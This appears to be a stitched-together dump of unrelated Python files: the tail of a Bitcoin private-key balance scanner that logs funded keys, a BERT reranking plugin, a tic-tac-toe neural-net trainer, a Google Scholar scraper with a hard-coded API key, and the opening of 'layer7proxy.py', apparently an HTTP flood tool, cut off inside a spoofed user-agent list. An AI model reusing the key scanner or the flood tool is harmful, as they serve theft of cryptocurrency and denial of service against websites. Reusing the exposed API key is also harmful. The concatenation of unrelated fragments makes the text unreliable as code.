balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
if balance['final_balance'] > 0:
fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(
balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print(isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
fp_found.flush()
fp_fund.flush()
except:
traceback.print_exc()
continue
page = page + 1
start_page_file.seek(0)
start_page_file.write(str(page) + "\n")
start_page_file.flush()
start_page_file.truncate()
clearScreen()
print(getCount)
time.sleep(10)
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet, args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
__init__.py
|
from threading import Thread
from typing import List, Tuple
import tensorflow as tf
from queue import Queue
import numpy as np
from nboost.plugins.models.rerank.tf.bert import modeling, tokenization
from nboost.plugins.models.rerank.base import RerankModelPlugin
from nboost import defaults
import pathlib
class TfBertRerankModelPlugin(RerankModelPlugin):
def __init__(self, *args, verbose=False, **kwargs):
super().__init__(*args, **kwargs)
self.output_q = Queue()
self.input_q = Queue()
self.model_dir = pathlib.Path(self.model_dir)
ckpts = list(self.model_dir.glob('*.ckpt*'))
if not len(ckpts) > 0:
raise FileNotFoundError("Tensorflow model not found %s" % self.model_dir)
self.checkpoint = str(ckpts[0]).split('.ckpt')[0] + '.ckpt'
self.vocab_file = str(self.model_dir.joinpath('vocab.txt'))
self.bert_config_file = str(self.model_dir.joinpath('bert_config.json'))
if not verbose:
tf.logging.set_verbosity(tf.logging.ERROR)
self.model_thread = Thread(target=self.run_model)
self.model_thread.start()
@staticmethod
def create_model(bert_config, input_ids, input_mask, segment_ids,
labels, num_labels):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=False,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=False)
output_layer = model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [num_labels, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [num_labels], initializer=tf.zeros_initializer())
with tf.variable_scope("loss"):
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def model_fn_builder(self, bert_config, num_labels, init_checkpoint):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
label_ids = features["label_ids"]
(total_loss, per_example_loss, log_probs) = self.create_model(
bert_config, input_ids, input_mask, segment_ids, label_ids,
num_labels)
tvars = tf.trainable_variables()
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
predictions={
"log_probs": log_probs,
"label_ids": label_ids,
})
return output_spec
return model_fn
def input_fn(self):
"""The actual input function."""
output_types = {
"input_ids": tf.int32,
"segment_ids": tf.int32,
"input_mask": tf.int32,
"label_ids": tf.int32,
}
dataset = tf.data.Dataset.from_generator(self.feature_generator, output_types)
dataset = dataset.padded_batch(
batch_size=self.batch_size,
padded_shapes={
"input_ids": [self.max_seq_len],
"segment_ids": [self.max_seq_len],
"input_mask": [self.max_seq_len],
"label_ids": [],
},
padding_values={
"input_ids": 0,
"segment_ids": 0,
"input_mask": 0,
"label_ids": 0,
},
drop_remainder=True)
return dataset
def run_model(self):
bert_config = modeling.BertConfig.from_json_file(self.bert_config_file)
assert self.max_seq_len <= bert_config.max_position_embeddings
run_config = tf.estimator.RunConfig(model_dir=str(self.model_dir))
model_fn = self.model_fn_builder(
bert_config=bert_config,
num_labels=2,
init_checkpoint=self.checkpoint)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
config=run_config)
result = estimator.predict(input_fn=self.input_fn,
yield_single_examples=True)
for item in result:
self.output_q.put((item["log_probs"], item["label_ids"]))
def feature_generator(self):
tokenizer = tokenization.FullTokenizer(vocab_file=self.vocab_file, do_lower_case=True)
while True:
next = self.input_q.get()
if not next:
break
query, candidates = next
query = tokenization.convert_to_unicode(query)
query_token_ids = tokenization.convert_to_bert_input(
text=query, max_seq_length=self.max_seq_len, tokenizer=tokenizer,
add_cls=True)
for i, doc_text in enumerate(candidates):
doc_token_id = tokenization.convert_to_bert_input(
text=tokenization.convert_to_unicode(doc_text),
max_seq_length=self.max_seq_len - len(query_token_ids),
tokenizer=tokenizer,
add_cls=False)
query_ids = query_token_ids
doc_ids = doc_token_id
input_ids = query_ids + doc_ids
query_segment_id = [0] * len(query_ids)
doc_segment_id = [1] * len(doc_ids)
segment_ids = query_segment_id + doc_segment_id
input_mask = [1] * len(input_ids)
features = {
"input_ids": input_ids,
"segment_ids": segment_ids,
"input_mask": input_mask,
"label_ids": 0
}
yield features
def pad(self, candidates):
if len(candidates) % self.batch_size == 0:
return candidates
else:
candidates += ['PADDING DOC'] * (self.batch_size - (len(candidates) % self.batch_size))
return candidates
def rank(self, query: bytes, choices: List[str],
filter_results=defaults.filter_results) -> Tuple[List[int], List[float]]:
actual_length = len(choices)
candidates = self.pad(choices)
self.input_q.put((query, choices))
results = [self.output_q.get() for _ in range(len(candidates))][:actual_length]
log_probs, labels = zip(*results)
log_probs = np.stack(log_probs).reshape(-1, 2)
scores = log_probs[:, 1]
assert len(scores) == actual_length
if filter_results:
scores = np.extract(log_probs[:, 0] < log_probs[:, 1], scores)
if len(scores.shape) > 1 and scores.shape[1] == 2:
scores = np.squeeze(scores[:, 1])
return list(scores.argsort()[::-1]), list(scores)
def close(self):
self.input_q.put(None)
self.model_thread.join()
|
trainAI.py
|
from board import *
import tttAI as ai
import neuralnet as nn
import numpy as np
import time
import threading
emptyBoard = "0 0 0 0 0 0 0 0 0 "
nGames = None
f = [1, 1, 1, 3, 3, 1]
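# Descriptive note (added; rationale inferred from playRound below): f holds
# weighting factors indexed by the number of moves X has made when a game ends.
# A finished game's recorded moves are duplicated f[nMoves] times via string
# repetition, so shorter wins contribute more training examples.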
def takeTurn( mrk, brd, ai ):
"""Ask player mrk for square to place their marker."""
done = False
boardStr = brd.convertBoard()
while (not done):
sqr = ai.takeTurn(brd)
if ( brd.isBlank(sqr) ):
brd.markSquare(sqr, mrk)
boardStr += str(sqr)
done = True
return boardStr
def playRound(p1AI, p2AI):
"""Play a round of tic-tac-toe."""
brd = Board()
p1Moves = ""
p2Moves = ""
nMoves = 0
while ( True ):
#X moves:
mv = takeTurn("X", brd, p1AI)
if (mv[:-1] == emptyBoard):
mv = ""
else:
mv += "\n"
p1Moves += mv
nMoves += 1
#X wins:
if ( brd.gameWon() ):
return ( f[nMoves] * p1Moves, "", np.array([1,0,0]))
#cat's game:
elif ( not brd.movesLeft() ):
return (p1Moves, p2Moves, np.array([0,0,1]))
p2Moves += takeTurn("O", brd, p2AI) + "\n"
#O wins:
if ( brd.gameWon() ):
return ("", f[nMoves] * p2Moves, np.array([0,1,0]))
def playGames( player1, player2, n ):
"""Plays a round. prompts for new game."""
p1Moves = ""
p2Moves = ""
record = np.array([0,0,0])
for i in xrange(n):
mvs1, mvs2, res = playRound(player1, player2)
p1Moves += mvs1
p2Moves += mvs2
record += res
return (p1Moves, p2Moves, record)
def writeMoves(moves, pNum):
"""Writes the moves to disk."""
writeFile = open("p{0}.txt".format(pNum), 'w')
writeFile.write(moves)
writeFile.close()
return
def generateData():
"""Runs lesson zero where random players generate game data."""
p1File = open("p1.txt", 'w')
p2File = open("p2.txt", 'w')
p1AI = ai.RandomAI()
p2AI = ai.RandomAI()
p1Moves, p2Moves, record = playGames( p1AI, p2AI, nGames)
p1File.write(p1Moves)
p2File.write(p2Moves)
p1File.close()
p2File.close()
print "\n\nRandom Vs. Random:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format(record[0], record[1], record[2])
return
def trainAIs(nnO, nnX, itr):
"""Performs one training sted of the tic tac toe AI's."""
dataX, yX = readin("p1.txt", int)
dataO, yO = readin("p2.txt", int)
t1 = threading.Thread( target = nnX.trainNetwork, args = (dataX, yX, l) )
t2 = threading.Thread( target = nnO.trainNetwork, args = (dataO, yO, l) )
start = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
end = time.time()
print "\n\nLesson {0} completed in: {1} (s)\n\n".format(itr, end - start)
return
def learnTicTacToe(maxItr, l, inNodes, outNodes, *hiddenNodes):
"""Trains player to (first or second set by pNum) to play tic tac toe for at most maxItr lessons."""
nnX = nn.NeuralNet(inNodes, outNodes, *hiddenNodes)
nnO = nn.NeuralNet(inNodes, outNodes, *hiddenNodes)
#Generate game data:
generateData()
for itr in xrange(1, maxItr + 1):
trainAIs(nnO, nnX, itr)
playerX = ai.NNAI(nnX)
playerO = ai.NNAI(nnO)
#X AI Vs random player:
xMoves, _, xVsRand = playGames( playerX, ai.RandomAI(), nGames)
writeMoves(xMoves, 1)
#Random player Vs O AI:
_, oMoves, oVsRand = playGames( ai.RandomAI(), playerO, nGames)
writeMoves(oMoves, 2)
#X AI Vs O AI:
_, _, xVsO = playGames( playerX, playerO, nGames)
print "AI Vs. Random:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format( xVsRand[0], xVsRand[1], xVsRand[2])
print "Random Vs. AI:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format( oVsRand[0], oVsRand[1], oVsRand[2])
print "AI Vs. AI:"
print "X: {0}, O: {1}, Tie: {2}\n\n".format( xVsO[0], xVsO[1], xVsO[2])
nnX.toFile("p1-{0}".format(itr))
nnO.toFile("p2-{0}".format(itr))
return
def readin( path, DT = float ):
data = np.loadtxt( path, delimiter = " ", dtype=DT)
X = data[:,0:9]
m,n = X.shape
y = data[:,9].reshape((m,1))
return (X, y)
if __name__ == "__main__":
nGames = 12000
maxItr = 3
#Neural net parameters:
l = 0.1
inNodes = 9
outNodes = 9
hiddenNodes = (10, 10)
learnTicTacToe(maxItr, l, inNodes, outNodes, *hiddenNodes)
|
main.py
|
from multiprocessing import Process, Queue, Manager
import scrapy.spiders
from scrapy.crawler import CrawlerProcess
from urllib.parse import urlencode
import re
import json
def GoogleScholar(request):
def SearchResultsScraper(request):
def script(queue, output):
try:
API_KEY = '2e2d79e9d8b5d22114ae3b4b4ba6b507'
def get_url(url):
payload = {'api_key': API_KEY, 'url': url, 'country_code': 'us'}
proxy_url = 'http://api.scraperapi.com/?' + urlencode(payload)
return proxy_url
class SearchResultsSpider(scrapy.Spider):
name = 'GoogleScholarSearchResultsSpider'
# allowed_domains = ['scholar.google.com']
allowed_domains = ['api.scraperapi.com']
def start_requests(self):
url = 'https://scholar.google.com/scholar?' + urlencode({'hl': 'en', 'q': self.query})
# yield scrapy.Request(url, callback=self.parse, meta={'position': 0})
yield scrapy.Request(get_url(url), callback=self.parse, meta={'position': 0})
def parse(self, response):
print(response.url)
position = response.meta['position']
for res in response.xpath('//*[@data-rp]'):
# Links
links = [res.xpath('.//h3/a/@href').extract_first()]
# Title
temp = res.xpath('.//h3/a//text()').extract()
if not temp:
title = "[C] " + "".join(res.xpath('.//h3/span[@id]//text()').extract())
else:
title = "".join(temp)
# Snippet
snippet = "".join(res.xpath('.//*[@class="gs_rs"]//text()').extract()).replace("\u2026","...").replace("\u00a0","")
# Citations
if res.xpath('.//a[starts-with(text(),"Cited")]/text()').extract_first() is not None:
citations = res.xpath('.//a[starts-with(text(),"Cited")]/text()').extract_first().replace("Cited by ", "")
else:
citations = ""
# Citations Link
temp = res.xpath("//div[@class='gs_fl']/a[3]/@href").extract_first()
citations_link = "https://scholar.google.com" + temp if temp else ""
# Related Link
temp = res.xpath('.//a[starts-with(text(),"Related")]/@href').extract_first()
related_link = "https://scholar.google.com" + temp if temp else ""
# Version Link
temp = res.xpath(".//a[@class='gs_nph']/@href").extract_first()
versions_link = "https://scholar.google.com" + temp if temp else ""
# Version Count
if res.xpath('.//a[contains(text(),"version")]/text()').extract_first() is not None:
versions = res.xpath('.//a[contains(text(),"version")]/text()').extract_first().replace("All ", "").replace(" versions", "")
else:
versions = ""
# Publisher Data
publisher_data = "".join(res.xpath('.//div[@class="gs_a"]//text()').extract()).replace("\u2026","...").replace("\u00a0","")
year = re.search("\d+", publisher_data)[0]
if (publisher_data.split("-")[1].split(",")[0].strip() != re.search("\d+", publisher_data)[0]):
journal = publisher_data.split("-")[1].split(",")[0].strip()
else:
journal = ""
authors = []
for author in publisher_data.split("-")[0].split(","):
authors.append(author.strip())
position += 1
paper = {'title': title, 'authors': authors, 'journal': journal, 'year': year,
'snippet': snippet, 'detailsLink': "None", 'links': links, 'citations': citations, 'citationsLink': citations_link,
'relatedLink': related_link, 'versions': versions, 'versionsLink': versions_link,}
output.append(paper)
yield paper
next_page = response.xpath('//td[@align="left"]/a/@href').extract_first()
if next_page:
url = "https://scholar.google.com" + next_page
# yield scrapy.Request(url, callback=self.parse,meta={'position': position})
yield scrapy.Request(get_url(url), callback=self.parse,meta={'position': position})
# Receive arguments from HTTP request
default_query = ['Residual learning']
query = request.args.get('q') if request.args.get('q')!=None else default_query
paper_count = request.args.get('paper_count') if request.args.get('paper_count')!=None else 10
custom_settings = {'CLOSESPIDER_ITEMCOUNT':f'{paper_count}',}
# Instantiate and run spider
process = CrawlerProcess(custom_settings)
process.crawl(SearchResultsSpider, query = query)
process.start()
queue.put(None)
# Check for errors in process and add to queue
except Exception as e:
queue.put(e)
queue = Queue()
manager = Manager()
output = manager.list()
# Wrapping the spider in a child process
main_process = Process(target=script, args=(queue, output,))
main_process.start()
main_process.join()
# Display error checking results
result = queue.get()
if result is not None:
raise result
return json.dumps(list(output))
service = request.args.get('svc')
if service == 'search_results':
return SearchResultsScraper(request)
elif service == 'paper_details':
return "ERROR: Paper details not found for Google Scholar"
else:
return "ERROR: Service request invalid"
|
layer7proxy.py
|
import urllib.request
import re
import random
from bs4 import BeautifulSoup
import threading
useragents=["AdsBot-Google ( http://www.google.com/adsbot.html)",
"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)",
"Baiduspider ( http://www.baidu.com/search/spider.htm)",
"BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)",
"BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0",
"BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100",
"BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105",
"BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102",
"BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0",
"BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123",
"Bloglines/3.1 (http://www.bloglines.com)",
"CSSCheck/1.2.2",
"Dillo/2.0",
"DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"DoCoMo/2.0 SH901iC(c100;TB;W24H12)",
"Download Demon/3.5.0.11",
"ELinks/0.12~pre5-4",
"ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)",
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)",
"EmailWolf 1.00",
"everyfeed-spider/2.0 (http://www.everyfeed.com)",
"facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)",
"FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)",
"FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)",
"Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php)",
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
"Googlebot-Image/1.0",
"Googlebot-News",
"Googlebot-Video/1.0",
"Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)",
"grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)",
"Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)",
"HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0",
"HTMLParser/1.6",
"iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)",
"iTunes/9.0.2 (Windows; N)",
"iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)",
"Java/1.6.0_13",
"Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0",
"Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)",
"LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1",
"LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"libwww-perl/5.820",
"Links/0.9.1 (Linux 2.4.24; i386;)",
"Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)",
"Links (2.1pre15; Linux 2.4.26 i686; 158x61)",
"Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)",
"Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12",
"Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d",
"Mediapartners-Google",
"Microsoft URL Control - 6.00.8862",
"Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ",
"MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0",
"MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0",
"MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0",
"Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1",
"Mozilla/2.02E (Win95; U)",
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
"Mozilla/3.01Gold (Win95; I)",
"Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS)",
"Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180)",
"Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; winfx; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0) ",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]",
"Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
"Mozilla/4.8 [en] (Windows NT 5.1; U)",
"Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1",
"Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) ",
"Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0",
"Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12",
"Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13",
"Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145",
"Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3",
"Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
